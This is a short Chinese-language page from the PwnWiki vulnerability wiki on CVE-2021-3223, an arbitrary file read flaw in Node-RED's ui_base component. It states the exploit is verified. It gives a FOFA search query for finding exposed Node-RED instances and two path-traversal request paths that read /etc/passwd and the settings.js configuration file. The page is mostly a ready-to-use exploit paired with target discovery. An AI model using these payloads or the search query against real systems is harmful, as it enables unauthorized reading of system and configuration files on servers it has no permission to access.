Loading
0

CVE-2021-3223 Node-RED ui base 任意文件读取漏洞

免费、自由、人人可编辑的漏洞库--PwnWiki.com

,

Check.png 该漏洞已通过验证


本页面的EXP/POC/Payload经测试可用,漏洞已经成功复现。

漏洞影响

Node-RED

FOFA

title="Node-RED"

POC

/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库